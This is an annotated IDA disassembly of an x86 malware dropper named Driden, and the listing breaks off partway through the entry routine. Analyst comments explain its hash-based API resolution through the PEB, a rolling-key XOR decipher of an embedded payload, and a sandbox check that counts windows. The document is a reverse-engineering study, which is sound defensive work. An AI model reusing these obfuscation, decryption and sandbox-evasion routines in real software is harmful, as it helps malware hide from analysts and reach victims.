seg000:00000000 ; seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; | This file has been generated by The Interactive Disassembler (IDA) | seg000:00000000 ; +-------------------------------------------------------------------------+ seg000:00000000 ; seg000:00000000 ; Input MD5 : 3D8ED11008205483BE04C48261B69D31 seg000:00000000 ; Input CRC32 : 70E63344 seg000:00000000 ; File Name : Driden_x86_dropper.bin seg000:00000000 ; Format : Binary file seg000:00000000 ; Base Address: 0000h Range: 0000h - 0C91h Loaded length: 00000C91h seg000:00000000 seg000:00000000 ;************************************************************************** seg000:00000000 ; Entry Point seg000:00000000 ; seg000:00000000 .686p seg000:00000000 .mmx seg000:00000000 .model flat seg000:00000000 ; =========================================================================== seg000:00000000 ; Segment type: Pure code seg000:00000000 seg000 segment byte public 'CODE' use32 seg000:00000000 assume cs:seg000 seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing seg000:00000000 29 C6 sub esi, eax seg000:00000002 E9 8C 03 00 00 jmp start seg000:00000007 seg000:00000007 ; -------------------------------------------------------------------------- seg000:00000007 ; Unused datas seg000:00000007 83 EB 65 sub ebx, 65h ; 'e' seg000:0000000A F7 DB neg ebx seg000:0000000C 83 F6 66 xor esi, 66h seg000:0000000F 81 D6 A8 00 00 00 adc esi, 0A8h ; '¿' seg000:00000015 F7 DF neg edi seg000:00000017 F7 DA neg edx seg000:00000019 ;---------------------------------------------------------------------------- seg000:00000019 seg000:00000019 seg000:00000019 ; *************************************************************************** seg000:00000019 ; * getModuleHandle * seg000:00000019 ; *************************************************************************** seg000:00000019 ; * DESCRIPTION : This function looks for a module base address using a * seg000:00000019 ; * hash of the module name. * seg000:00000019 ; * * seg000:00000019 ; * INPUT : * seg000:00000019 ; * arg_0 = hash of module name * seg000:00000019 ; * * seg000:00000019 ; * OUTPUT : * seg000:00000019 ; * EAX = module base address * seg000:00000019 ; *************************************************************************** seg000:00000019 seg000:00000019 ; =============== S U B R O U T I N E ======================================= seg000:00000019 ; Attributes: bp-based frame seg000:00000019 getModuleHandle proc near ; ... seg000:00000019 var_1C = dword ptr -1Ch seg000:00000019 var_18 = dword ptr -18h seg000:00000019 var_14 = dword ptr -14h seg000:00000019 var_10 = dword ptr -10h seg000:00000019 var_C = dword ptr -0Ch seg000:00000019 var_4 = dword ptr -4 seg000:00000019 arg_0 = dword ptr 8 seg000:00000019 55 push ebp seg000:0000001A 89 E5 mov ebp, esp seg000:0000001C 83 EC 1C sub esp, 1Ch seg000:0000001F 53 push ebx seg000:00000020 56 push esi seg000:00000021 57 push edi seg000:00000022 13 55 E4 adc edx, [ebp+var_1C] seg000:00000025 6A 30 push 30h ; '0' seg000:00000027 96 xchg eax, esi seg000:00000028 EB 03 jmp short loc_2D seg000:0000002A EC 89 dw 89ECh seg000:0000002C 72 db 72h seg000:0000002D loc_2D: ; ... seg000:0000002D 58 pop eax ; EAX=0x30 seg000:0000002E 89 F9 mov ecx, edi ; ECX=0x152DC1 seg000:00000030 64 FF 30 push dword ptr fs:[eax] seg000:00000033 F7 D6 not esi seg000:00000035 5A pop edx ; EDX = FS:[30h] seg000:00000036 83 C7 0F add edi, 0Fh seg000:00000039 8B 52 0C mov edx, [edx+0Ch] ; EDX refers PEB_LDR_DATA which contains informations about modules loaded in process seg000:0000003C 4B dec ebx seg000:0000003D EB 03 jmp short loc_42 seg000:0000003F 22 63 D0 and ah, [ebx-30h] seg000:00000042 loc_42: ; ... seg000:00000042 8D 52 14 lea edx, [edx+14h] ; mLIST InMemOrder; seg000:00000045 81 D7 F0 00 00 00 adc edi, 0F0h ; '' seg000:0000004B EB 01 jmp short loc_4E seg000:0000004D 6A db 6Ah seg000:0000004E loc_4E: ; ... seg000:0000004E 89 D3 mov ebx, edx ; Saving first module address to know when stop to parse linked list seg000:00000050 2B 4D EC sub ecx, [ebp+var_14] seg000:00000053 loc_53: ; ... seg000:00000053 21 75 FC and [ebp+var_4], esi seg000:00000056 8B 12 mov edx, [edx] ; Next module please seg000:00000058 49 dec ecx seg000:00000059 31 FF xor edi, edi seg000:0000005B 05 BB 00 00 00 add eax, 0BBh ; '+' seg000:00000060 39 DA cmp edx, ebx ; All list done ? seg000:00000062 75 1D jnz short loc_81 seg000:00000064 C7 45 F4 E6 00 00+ mov [ebp+var_C], 0E6h ; 'µ' seg000:0000006B EB 01 jmp short loc_6E seg000:0000006D AB stosd seg000:0000006E loc_6E: ; ... seg000:0000006E 31 C0 xor eax, eax ; EAX=0 seg000:00000070 87 55 F0 xchg edx, [ebp+var_10] seg000:00000073 5F pop edi seg000:00000074 5E pop esi seg000:00000075 5B pop ebx seg000:00000076 C9 leave seg000:00000077 C2 04 00 retn 4 ; ==> Module not found ! seg000:0000007A 19 D3 sbb ebx, edx seg000:0000007C loc_7C: seg000:0000007C EB 03 jmp short loc_81 seg000:0000007E 4F db 4Fh ; O seg000:0000007F 87 unk_7F db 87h ; ç seg000:00000080 9A db 9Ah ; Ü seg000:00000081 loc_81: ; ... seg000:00000081 F7 D0 not eax seg000:00000083 53 push ebx seg000:00000084 F7 D0 not eax seg000:00000086 EB 01 jmp short loc_89 seg000:00000088 9B wait seg000:00000089 loc_89: ; ... seg000:00000089 8D 72 24 lea esi, [edx+24h] ; ESI -> LDR_MODULE.FullDllName seg000:00000089 ; 2 bytes length seg000:00000089 ; 2 bytes maxLength seg000:00000089 ; 4 bytes pointer to Unicode String seg000:0000008C 0D EA 00 00 00 or eax, 0EAh seg000:00000091 52 push edx seg000:00000092 F7 D1 not ecx seg000:00000094 0F B7 0E movzx ecx, word ptr [esi] ; ECX = size of complete module name seg000:00000097 15 F1 00 00 00 adc eax, 0F1h ; '±' seg000:0000009C EB 02 jmp short loc_A0 seg000:0000009E 1A C0 sbb al, al seg000:000000A0 loc_A0: ; ... seg000:000000A0 8B 76 04 mov esi, [esi+4] ; ESI refers module name seg000:000000A3 89 D3 mov ebx, edx seg000:000000A5 D1 E9 shr ecx, 1 ; length unicode->ascii seg000:000000A7 F7 D8 neg eax seg000:000000A9 83 F9 00 cmp ecx, 0 ; Name empty ? seg000:000000AC 74 33 jz short loc_E1 seg000:000000AE 42 inc edx seg000:000000AF EDI vaut 0 au début seg000:000000AF nextChar: ; ... seg000:000000AF 11 F2 adc edx, esi seg000:000000B1 C1 C7 05 rol edi, 5 seg000:000000B4 90 nop seg000:000000B5 EB 03 jmp short loc_BA seg000:000000B7 F9 db 0F9h ; ¨ seg000:000000B8 91 7E db 91h, 7Eh seg000:000000BA loc_BA: ; ... seg000:000000BA 66 AD lodsw ; AX = an unicode char of the name seg000:000000BC 43 inc ebx seg000:000000BD 25 FF FF 00 00 and eax, 0FFFFh ; EAX = caractère unicode seg000:000000C2 43 inc ebx seg000:000000C3 EB 02 jmp short loc_C7 seg000:000000C5 81 94 db 81h, 94h seg000:000000C7 loc_C7: ; ... seg000:000000C7 83 C8 20 or eax, 20h ; Is it a space ? seg000:000000CA 8B 55 E8 mov edx, [ebp+var_18] seg000:000000CD 31 C7 xor edi, eax seg000:000000CF 21 F0 and eax, esi ; dumb seg000:000000D1 EB 01 jmp short loc_D4 seg000:000000D3 0D db 0Dh seg000:000000D4 loc_D4: ; ... seg000:000000D4 81 F7 1F 6D 75 00 xor edi, 756D1Fh seg000:000000DA 29 CB sub ebx, ecx ; dumb seg000:000000DC 49 dec ecx seg000:000000DD 75 D0 jnz short nextChar ; Next char of the name please... seg000:000000DF 87 D2 xchg edx, edx seg000:000000E1 loc_E1: ; ... seg000:000000E1 F7 D8 neg eax seg000:000000E3 5A pop edx seg000:000000E4 87 C9 xchg ecx, ecx seg000:000000E6 5B pop ebx seg000:000000E7 31 F6 xor esi, esi ; ESI=0 seg000:000000E9 EB 01 jmp short loc_EC seg000:000000EB 7D db 7Dh ; "}" seg000:000000EC loc_EC: ; ... seg000:000000EC 3B 7D 08 cmp edi, [ebp+arg_0] ; Compare computed hash with the one looked for... seg000:000000EF 75 10 jnz short loc_101 seg000:000000F1 ; Ok, module found !!! seg000:000000F1 87 F1 xchg esi, ecx seg000:000000F3 8B 42 10 mov eax, [edx+10h] seg000:000000F6 43 inc ebx seg000:000000F7 5F pop edi seg000:000000F8 5E pop esi seg000:000000F9 5B pop ebx seg000:000000FA C9 leave seg000:000000FB C2 04 00 retn 4 seg000:000000FE 2B 4D E8 sub ecx, [ebp+var_18] seg000:00000101 loc_101: ; ... seg000:00000101 19 CE sbb esi, ecx seg000:00000103 E9 4B FF FF FF jmp loc_53 seg000:00000103 getModuleHandle endp seg000:00000108 seg000:00000108 seg000:00000108 ; *************************************************************************** seg000:00000108 ; * getAPIAddress * seg000:00000108 ; *************************************************************************** seg000:00000108 ; * DESCRIPTION : This function is equivalent to GetProcAddress (). * seg000:00000108 ; * * seg000:00000108 ; * INPUT : * seg000:00000108 ; * arg_0 = module base address (or handle) * seg000:00000108 ; * arg_4 = hash of function which entry point is looked for * seg000:00000108 ; * * seg000:00000108 ; * OUTPUT : * seg000:00000108 ; * EAX = entry point of function * seg000:00000108 ; *************************************************************************** seg000:00000108 seg000:00000108 ; =============== S U B R O U T I N E ======================================= seg000:00000108 ; Attributes: bp-based frame seg000:00000108 getAPIAddress proc near ; ... seg000:00000108 var_58 = dword ptr -58h seg000:00000108 var_54 = dword ptr -54h seg000:00000108 var_3C = dword ptr -3Ch seg000:00000108 var_34 = dword ptr -34h seg000:00000108 var_30 = dword ptr -30h seg000:00000108 var_2C = dword ptr -2Ch seg000:00000108 var_28 = dword ptr -28h seg000:00000108 var_18 = dword ptr -18h seg000:00000108 var_10 = dword ptr -10h seg000:00000108 var_8 = dword ptr -8 seg000:00000108 var_4 = dword ptr -4 seg000:00000108 arg_0 = dword ptr 8 seg000:00000108 arg_4 = dword ptr 0Ch seg000:00000108 55 push ebp seg000:00000109 89 E5 mov ebp, esp seg000:0000010B 83 EC 58 sub esp, 58h seg000:0000010E 53 push ebx seg000:0000010F 56 push esi seg000:00000110 57 push edi seg000:00000111 43 inc ebx ; EBX=1 seg000:00000112 EB 03 jmp short loc_117 seg000:00000114 3C 77 cmp al, 77h ; 'w' seg000:00000116 48 dec eax seg000:00000117 loc_117: ; ... seg000:00000117 8B 45 08 mov eax, [ebp+arg_0] ; Retrieve base address of module (ie handle) seg000:0000011A 87 7D D4 xchg edi, [ebp+var_2C] seg000:0000011D 89 C1 mov ecx, eax seg000:0000011F 83 C1 3C add ecx, 3Ch ; '<' seg000:00000122 03 01 add eax, [ecx] ; EAX=PE Header seg000:00000124 11 CE adc esi, ecx seg000:00000126 83 C0 78 add eax, 78h ; 'x' ; EAX -> module IMAGE_DATA_DIRECTORY seg000:00000129 83 E2 1D and edx, 1Dh seg000:0000012C EB 03 jmp short loc_131 seg000:0000012E C7 DA dw 0DAC7h seg000:00000130 03 db 3 seg000:00000131 loc_131: ; ... seg000:00000131 FF 30 push dword ptr [eax] ; Stacking Export Table address... seg000:00000133 0F AF D7 imul edx, edi seg000:00000136 EB 02 jmp short loc_13A seg000:00000138 C3 retn seg000:00000139 B8 db 0B8h seg000:0000013A loc_13A: ; ... seg000:0000013A 58 pop eax ; ...and unstacking it seg000:0000013B 43 inc ebx seg000:0000013C 03 45 08 add eax, [ebp+arg_0] seg000:0000013F 31 CE xor esi, ecx seg000:00000141 EB 03 jmp short loc_146 seg000:00000143 51 push ecx seg000:00000144 B4 1D mov ah, 1Dh seg000:00000146 loc_146: ; ... seg000:00000146 89 45 E8 mov [ebp+var_18], eax seg000:00000149 8B 55 CC mov edx, [ebp+var_34] seg000:0000014C 8B 48 20 mov ecx, [eax+20h] seg000:0000014F 89 C3 mov ebx, eax seg000:00000151 EB 02 jmp short loc_155 seg000:00000153 4D dec ebp seg000:00000154 1E push ds seg000:00000155 loc_155: ; ... seg000:00000155 03 4D 08 add ecx, [ebp+arg_0] seg000:00000158 42 inc edx seg000:00000159 89 4D F0 mov [ebp+var_10], ecx seg000:0000015C F7 D1 not ecx seg000:0000015E 8B 48 18 mov ecx, [eax+18h] seg000:00000161 F7 D3 not ebx seg000:00000163 EB 03 jmp short loc_168 seg000:00000165 EB 5E jmp short loc_1C5 seg000:00000167 3F aas seg000:00000168 loc_168: ; ... seg000:00000168 89 4D D0 mov [ebp+var_30], ecx seg000:0000016B 89 DB mov ebx, ebx seg000:0000016D loc_16D: ; ... seg000:0000016D 11 C7 adc edi, eax seg000:0000016F EB 02 jmp short loc_173 seg000:00000171 FA cli seg000:00000172 ED in eax, dx seg000:00000173 loc_173: ; ... seg000:00000173 FF 4D D0 dec [ebp+var_30] seg000:00000176 19 C3 sbb ebx, eax seg000:00000178 8B 4D D0 mov ecx, [ebp+var_30] seg000:0000017B 31 C0 xor eax, eax seg000:0000017D EB 02 jmp short loc_181 seg000:0000017F A4 movsb seg000:00000180 27 daa seg000:00000181 loc_181: ; ... seg000:00000181 C1 E1 02 shl ecx, 2 seg000:00000184 46 inc esi seg000:00000185 03 4D F0 add ecx, [ebp+var_10] seg000:00000188 BB AB 00 00 00 mov ebx, 0ABh ; '½' seg000:0000018D EB 01 jmp short loc_190 seg000:0000018F 9A db 9Ah seg000:00000190 loc_190: ; ... seg000:00000190 8B 09 mov ecx, [ecx] seg000:00000192 43 inc ebx seg000:00000193 03 4D 08 add ecx, [ebp+arg_0] seg000:00000196 19 C6 sbb esi, eax seg000:00000198 31 C0 xor eax, eax seg000:0000019A F7 D6 not esi seg000:0000019C loc_19C: ; ... seg000:0000019C 19 CF sbb edi, ecx seg000:0000019E 0F B6 11 movzx edx, byte ptr [ecx] seg000:000001A1 F7 DB neg ebx seg000:000001A3 83 CA 20 or edx, 20h seg000:000001A6 83 F6 14 xor esi, 14h seg000:000001A9 EB 02 jmp short loc_1AD seg000:000001AB 51 push ecx seg000:000001AC F5 cmc seg000:000001AD loc_1AD: ; ... seg000:000001AD C1 C0 05 rol eax, 5 seg000:000001B0 81 45 F8 9D 00 00+ add [ebp+var_8], 9Dh ; 'Ø' seg000:000001B7 31 D0 xor eax, edx seg000:000001B9 81 75 A8 DD 00 00+ xor [ebp+var_58], 0DDh seg000:000001C0 35 1F 6D 75 00 xor eax, 756D1Fh seg000:000001C5 loc_1C5: ; ... seg000:000001C5 81 C6 AF 00 00 00 add esi, 0AFh ; '»' seg000:000001CB EB 02 jmp short loc_1CF seg000:000001CD 28 DB sub bl, bl seg000:000001CF loc_1CF: ; ... seg000:000001CF 41 inc ecx seg000:000001D0 87 FE xchg edi, esi seg000:000001D2 80 39 00 cmp byte ptr [ecx], 0 seg000:000001D5 75 C5 jnz short loc_19C ; Next char please... seg000:000001D7 4E dec esi seg000:000001D8 EB 03 jmp short loc_1DD seg000:000001DA 13 15 dw 1513h seg000:000001DC DE db 0DEh seg000:000001DD loc_1DD: ; ... seg000:000001DD 3B 45 0C cmp eax, [ebp+arg_4] ; On compare le hash reçu en paramètre avec EAX seg000:000001E0 75 4E jnz short loc_230 seg000:000001E2 0F AF FF imul edi, edi seg000:000001E5 EB 01 jmp short loc_1E8 seg000:000001E7 42 inc edx seg000:000001E8 loc_1E8: ; ... seg000:000001E8 8B 45 E8 mov eax, [ebp+var_18] seg000:000001EB 09 C6 or esi, eax seg000:000001ED 83 C0 24 add eax, 24h ; '$' seg000:000001F0 F7 DA neg edx seg000:000001F2 8B 00 mov eax, [eax] seg000:000001F4 F7 DE neg esi seg000:000001F6 03 45 08 add eax, [ebp+arg_0] seg000:000001F9 46 inc esi seg000:000001FA 8B 4D D0 mov ecx, [ebp+var_30] seg000:000001FD F7 DF neg edi seg000:000001FF 0F B7 0C 48 movzx ecx, word ptr [eax+ecx*2] seg000:00000203 42 inc edx seg000:00000204 EB 02 jmp short loc_208 seg000:00000206 AD db 0ADh ; ¡ seg000:00000207 9A db 9Ah seg000:00000208 loc_208: ; ... seg000:00000208 8B 45 E8 mov eax, [ebp+var_18] seg000:0000020B 01 FA add edx, edi seg000:0000020D 83 C0 1C add eax, 1Ch seg000:00000210 89 DF mov edi, ebx seg000:00000212 8B 00 mov eax, [eax] seg000:00000214 46 inc esi seg000:00000215 03 45 08 add eax, [ebp+arg_0] seg000:00000218 33 75 FC xor esi, [ebp+var_4] seg000:0000021B 8B 04 88 mov eax, [eax+ecx*4] seg000:0000021E F7 DE neg esi seg000:00000220 03 45 08 add eax, [ebp+arg_0] seg000:00000223 11 75 AC adc [ebp+var_54], esi seg000:00000226 5F pop edi seg000:00000227 5E pop esi seg000:00000228 5B pop ebx seg000:00000229 C9 leave seg000:0000022A C2 08 00 retn 8 seg000:0000022D 87 55 D8 xchg edx, [ebp+var_28] seg000:00000230 loc_230: ; ... seg000:00000230 11 F9 adc ecx, edi seg000:00000232 EB 01 jmp short loc_235 seg000:00000234 20 db 20h seg000:00000235 loc_235: ; ... seg000:00000235 83 7D D0 00 cmp [ebp+var_30], 0 seg000:00000239 0F 85 2E FF FF FF jnz loc_16D seg000:0000023F 11 75 A8 adc [ebp+var_58], esi seg000:00000242 31 C0 xor eax, eax seg000:00000244 1B 75 C4 sbb esi, [ebp+var_3C] seg000:00000247 5F pop edi seg000:00000248 5E pop esi seg000:00000249 5B pop ebx seg000:0000024A C9 leave seg000:0000024B C2 08 00 retn 8 seg000:0000024B getAPIAddress endp seg000:0000024E seg000:0000024E seg000:0000024E ; *************************************************************************** seg000:0000024E ; * bufferDecipher * seg000:0000024E ; *************************************************************************** seg000:0000024E ; * DESCRIPTION : This function deciphers a buffer (will be called to * seg000:0000024E ; * decipher payload before unzipping it). * seg000:0000024E ; * * seg000:0000024E ; * INPUT : * seg000:0000024E ; * arg_0 = lpBuffer = address of the buffer to decipher * seg000:0000024E ; * arg_4 = bufferSize = size of the buffer to decipher * seg000:0000024E ; * arg_8 = key = deciphering key * seg000:0000024E ; * * seg000:0000024E ; * OUTPUT : * seg000:0000024E ; * nothing * seg000:0000024E ; *************************************************************************** seg000:0000024E seg000:0000024E ; =============== S U B R O U T I N E ======================================= seg000:0000024E ; Attributes: bp-based frame seg000:0000024E bufferDecipher proc near ; ... seg000:0000024E var_30 = dword ptr -30h seg000:0000024E var_24 = dword ptr -24h seg000:0000024E var_20 = dword ptr -20h seg000:0000024E var_1C = dword ptr -1Ch seg000:0000024E var_10 = dword ptr -10h seg000:0000024E var_8 = dword ptr -8 seg000:0000024E lpBuffer = dword ptr 8 seg000:0000024E bufferSize = byte ptr 0Ch seg000:0000024E key = dword ptr 10h seg000:0000024E 55 push ebp ; lgBuffer = 0xB070 seg000:0000024E ; key = 0xA0D3CD56 seg000:0000024F 89 E5 mov ebp, esp seg000:00000251 83 EC 24 sub esp, 24h seg000:00000254 53 push ebx seg000:00000255 56 push esi seg000:00000256 01 5D E0 add [ebp+var_20], ebx seg000:00000259 8D 45 0C lea eax, [ebp+bufferSize] seg000:0000025C FF 30 push dword ptr [eax] ; Stacks buffer size... seg000:0000025E 87 7D F0 xchg edi, [ebp+var_10] seg000:00000261 5B pop ebx ; ...and unstacks into EBX ! seg000:00000262 09 CE or esi, ecx seg000:00000264 EB 02 jmp short loc_268 seg000:00000266 1F db 1Fh seg000:00000267 A9 db 0A9h seg000:00000268 loc_268: ; ... seg000:00000268 83 EB 03 sub ebx, 3 seg000:0000026B 87 CA xchg ecx, edx seg000:0000026D EB 01 jmp short loc_270 seg000:0000026F 5F pop edi seg000:00000270 loc_270: ; ... seg000:00000270 8B 75 08 mov esi, [ebp+lpBuffer] seg000:00000273 8B 7D E4 mov edi, [ebp+var_1C] seg000:00000276 ; seg000:00000276 ;------------------------------------------------------------- seg000:00000276 ; Début boucle de déchiffrement seg000:00000276 ; seg000:00000276 ; EBX sert de compteur seg000:00000276 ;------------------------------------------------------------- seg000:00000276 nextDword: ; ... seg000:00000276 31 C1 xor ecx, eax seg000:00000278 83 FB 00 cmp ebx, 0 seg000:0000027B 74 6A jz short loc_2E7 ; ======> No more bytes to decipher... seg000:0000027D 0F AF FF imul edi, edi seg000:00000280 8B 06 mov eax, [esi] ; Taking 4 bytes from the source... seg000:00000282 49 dec ecx seg000:00000283 33 45 10 xor eax, [ebp+key] ; ...deciphering them... seg000:00000286 0F AF FE imul edi, esi seg000:00000289 89 06 mov [esi], eax ; ...and putting them back in the buffer ! seg000:0000028B 09 4D DC or [ebp+var_24], ecx seg000:0000028E FF 75 10 push [ebp+key] ; Pushs the key on the stack seg000:00000291 89 F2 mov edx, esi seg000:00000293 C1 04 24 04 rol [esp+30h+var_30], 4 ; Rolling the key 4 bits left seg000:00000297 C7 45 E0 FD 00 00+ mov [ebp+var_20], 0FDh ; '²' seg000:0000029E C1 04 24 02 rol [esp+30h+var_30], 2 ; ...and 2 more bits... seg000:000002A2 6B FF 0B imul edi, 0Bh seg000:000002A5 EB 01 jmp short loc_2A8 seg000:000002A7 2B db 2Bh seg000:000002A8 loc_2A8: ; ... seg000:000002A8 D1 04 24 rol [esp+30h+var_30], 1 ; ...and one more bit ! seg000:000002AB F7 DF neg edi seg000:000002AD 8D 4D 0C lea ecx, [ebp+bufferSize] seg000:000002B0 8B 09 mov ecx, [ecx] ; ECX = buffer size seg000:000002B2 29 0C 24 sub [esp+30h+var_30], ecx ; Key = key-bufferSize seg000:000002B5 83 DA 17 sbb edx, 17h seg000:000002B8 81 2C 24 8A 3F 61+ sub [esp+30h+var_30], 49613F8Ah ; Key = Key-0x49673F8A seg000:000002BF 4A dec edx seg000:000002C0 EB 02 jmp short loc_2C4 seg000:000002C2 15 db 15h seg000:000002C3 CE db 0CEh ; + seg000:000002C4 loc_2C4: ; ... seg000:000002C4 81 2C 24 48 C3 34+ sub [esp+30h+var_30], 34C348h ; Key=Key-0x34C348 seg000:000002CB 1B 7D F8 sbb edi, [ebp+var_8] seg000:000002CE EB 02 jmp short loc_2D2 seg000:000002D0 D3 AF db 0D3h, 0AFh seg000:000002D2 loc_2D2: ; ... seg000:000002D2 8F 45 10 pop [ebp+key] ; Pops the key modified directly on the stack seg000:000002D5 29 D8 sub eax, ebx seg000:000002D7 4B dec ebx seg000:000002D8 8B 45 DC mov eax, [ebp+var_24] seg000:000002DB EB 02 jmp short loc_2DF seg000:000002DD 33 21 xor esp, [ecx] seg000:000002DF loc_2DF: ; ... seg000:000002DF 46 inc esi seg000:000002E0 F7 DA neg edx seg000:000002E2 EB 01 jmp short loc_2E5 seg000:000002E4 09 db 9 seg000:000002E5 loc_2E5: ; ... seg000:000002E5 EB 8F jmp short nextDword seg000:000002E7 loc_2E7: ; ... seg000:000002E7 89 75 F0 mov [ebp+var_10], esi seg000:000002EA EB 03 jmp short loc_2EF seg000:000002EC C8 29 5B db 0C8h, 29h, 5Bh seg000:000002EF loc_2EF: ; ... seg000:000002EF 5E pop esi seg000:000002F0 5B pop ebx seg000:000002F1 C9 leave seg000:000002F2 C2 0C 00 retn 0Ch seg000:000002F2 bufferDecipher endp seg000:000002F5 seg000:000002F5 seg000:000002F5 ; *************************************************************************************** seg000:000002F5 ; * detectSandbox ? * seg000:000002F5 ; *************************************************************************************** seg000:000002F5 ; * DESCRIPTION : this function counts the Windows in the system and returns 1 if the * seg000:000002F5 ; * number of windows is 15, 1C, 7 or 6, else it returns 0. * seg000:000002F5 ; * * seg000:000002F5 ; *************************************************************************************** seg000:000002F5 seg000:000002F5 ; =============== S U B R O U T I N E ======================================= seg000:000002F5 ; Attributes: bp-based frame seg000:000002F5 detectSandbox proc near ; ... seg000:000002F5 var_8 = dword ptr -8 seg000:000002F5 var_4 = dword ptr -4 seg000:000002F5 arg_0 = dword ptr 8 seg000:000002F5 arg_4 = dword ptr 0Ch seg000:000002F5 55 push ebp seg000:000002F6 89 E5 mov ebp, esp seg000:000002F8 83 EC 34 sub esp, 34h seg000:000002FB 87 7D FC xchg edi, [ebp+var_4] ; EDI=0xC91 seg000:000002FE C7 45 F8 00 00 00+ mov [ebp+var_8], 0 seg000:00000305 46 inc esi seg000:00000306 8D 45 F8 lea eax, [ebp+var_8] ; [ebp+var_8] is the counter of windows seg000:00000309 11 DE adc esi, ebx seg000:0000030B EB 03 jmp short loc_310 seg000:0000030D BC db 0BCh ; + seg000:0000030E EA db 0EAh ; Û seg000:0000030F AB db 0ABh ; ½ seg000:00000310 loc_310: ; ... seg000:00000310 50 push eax ; EAX refers [ebp+var_8] => lpParam for future call to EnumWindows(); seg000:00000311 47 inc edi seg000:00000312 E8 1F 00 00 00 call sub_336 seg000:00000317 ; We will never return here since we have stacked only one parameter and called a portion seg000:00000317 ; of code who will call EnumWindows(). The return address stacked by the call will be seg000:00000317 ; used as the EnumWindows callback function. seg000:00000317 ; ======================================================================================= seg000:00000317 seg000:00000317 seg000:00000317 seg000:00000317 ; --------------------------------------------------------------------------------------- seg000:00000317 ; Entry point of the EnumWindows callback function called by sub_336 seg000:00000317 ; seg000:00000317 ; BOOL CALLBACK EnumWindowsProc ( _In_ HWND hwnd, _In_ LPARAM lParam ); seg000:00000317 ; seg000:00000317 ; This callback function is used to count the number of windows in the system. seg000:00000317 19 CA sbb edx, ecx seg000:00000319 8B 44 24 08 mov eax, [esp+arg_0] ; EAX = lParam = pointer to windows counter seg000:0000031D 83 F1 2D xor ecx, 2Dh seg000:00000320 EB 02 jmp short loc_324 seg000:00000322 12 97 dw 9712h seg000:00000324 loc_324: ; ... seg000:00000324 FF 00 inc dword ptr [eax] ; Increment windows counter seg000:00000326 29 F2 sub edx, esi seg000:00000328 EB 01 jmp short loc_32B seg000:0000032A AD lodsd seg000:0000032B loc_32B: ; ... seg000:0000032B B8 01 00 00 00 mov eax, 1 ; Return 1 to continue enumeration seg000:00000330 4A dec edx seg000:00000331 C2 08 00 retn 8 seg000:00000331 detectSandbox endp ; sp-analysis failed seg000:00000334 29 F7 sub edi, esi seg000:00000336 ; --------------------------------------------------------------------------------------- seg000:00000336 seg000:00000336 seg000:00000336 ; ======================================================================================= seg000:00000336 ; This is not really a subroutine. IDA had been fooled by the EnumWindows seg000:00000336 ; callback function hidden into sub_2F5 seg000:00000336 ; =============== S U B R O U T I N E ======================================= seg000:00000336 sub_336 proc near ; ... seg000:00000336 68 21 5E 53 7C push 7C535E21h ; 'User32.dll' seg000:0000033B E8 D9 FC FF FF call getModuleHandle seg000:00000340 68 CA 16 5D 38 push 385D16CAh ; EnumWindows seg000:00000345 50 push eax seg000:00000346 E8 BD FD FF FF call getAPIAddress seg000:0000034B FF D0 call eax seg000:0000034D ; seg000:0000034D ; Here we return from EnumWindows() and [EBP-8] contains the number of windows enumerated seg000:0000034D ; It seems that some sandboxes have only a few windows to enumerate because seg000:0000034D ; if there is only 0x15, 0x1C, 7 or 6 windows, we will terminate here ! seg000:0000034D F7 D7 not edi seg000:0000034F 83 7D F8 15 cmp dword ptr [ebp-8], 15h ; [EBP-8] is the windows counter (Value = 0x5A in my XP VM) seg000:00000353 74 2A jz short loc_37F seg000:00000355 81 C1 E5 00 00 00 add ecx, 0E5h ; 'Õ' seg000:0000035B 83 7D F8 1C cmp dword ptr [ebp-8], 1Ch seg000:0000035F 74 1E jz short loc_37F seg000:00000361 01 C0 add eax, eax seg000:00000363 83 7D F8 07 cmp dword ptr [ebp-8], 7 seg000:00000367 74 16 jz short loc_37F seg000:00000369 0F AF DA imul ebx, edx seg000:0000036C EB 01 jmp short loc_36F seg000:0000036E A7 db 0A7h ; º seg000:0000036F loc_36F: ; ... seg000:0000036F 83 7D F8 06 cmp dword ptr [ebp-8], 6 seg000:00000373 74 0A jz short loc_37F seg000:00000375 09 C3 or ebx, eax seg000:00000377 EB 01 jmp short loc_37A seg000:00000379 6D db 6Dh seg000:0000037A loc_37A: ; ... seg000:0000037A EB 0E jmp short loc_38A seg000:0000037C 87 db 87h ; ç seg000:0000037D 7D db 7Dh ; } seg000:0000037E D8 db 0D8h ; Ï seg000:0000037F loc_37F: ; ... seg000:0000037F 89 C3 mov ebx, eax seg000:00000381 B8 01 00 00 00 mov eax, 1 ; Return 1 ==> process will be terminated ! seg000:00000386 F7 D7 not edi seg000:00000388 C9 leave seg000:00000389 C3 retn ; ===> We will come back in 0x3B1 ! seg000:0000038A loc_38A: ; ... seg000:0000038A 31 4D F0 xor [ebp-10h], ecx seg000:0000038D 31 C0 xor eax, eax ; Return 0 => we will live... seg000:0000038F 01 CF add edi, ecx seg000:00000391 C9 leave seg000:00000392 C3 retn ; ===> We will come back in 0x3B1 ! seg000:00000392 sub_336 endp ; sp-analysis failed seg000:00000393 ; End of detectSandbox seg000:00000393 ; ************************************************************************** seg000:00000393 seg000:00000393 seg000:00000393 seg000:00000393 seg000:00000393 seg000:00000393 ; ************************************************************************** seg000:00000393 ; seg000:00000393 ; ======> Here is the real entry point ! seg000:00000393 ; seg000:00000393 start: ; ... seg000:00000393 55 push ebp seg000:00000394 89 E5 mov ebp, esp seg000:00000396 81 EC 28 08 00 00 sub esp, 828h seg000:0000039C C7 85 CC FC FF FF+ mov dword ptr [ebp-334h], 0FFFFFFFFh seg000:000003A6 11 C8 adc eax, ecx seg000:000003A8 EB 02 jmp short loc_3AC seg000:000003AA 1C 12 dw 121Ch seg000:000003AC loc_3AC: ; ... seg000:000003AC E8 44 FF FF FF call detectSandbox seg000:000003B1 21 CE and esi, ecx seg000:000003B3 EB 02 jmp short loc_3B7 seg000:000003B5 2D 1B dw 1B2Dh seg000:000003B7 loc_3B7: ; ... seg000:000003B7 83 F8 00 cmp eax, 0 seg000:000003BA 0F 85 AB 08 00 00 jnz loc_C6B ; We are in a sandbox ==> ExitProcess () ! seg000:000003C0 81 E1 CC 00 00 00 and ecx, 0CCh seg000:000003C6 6A 00 push 0 seg000:000003C8 83 75 A8 6E xor dword ptr [ebp-58h], 6Eh seg000:000003CC EB 01 jmp short loc_3CF seg000:000003CE E8 db 0E8h seg000:000003CF loc_3CF: ; ... seg000:000003CF 68 45 98 BB F3 push 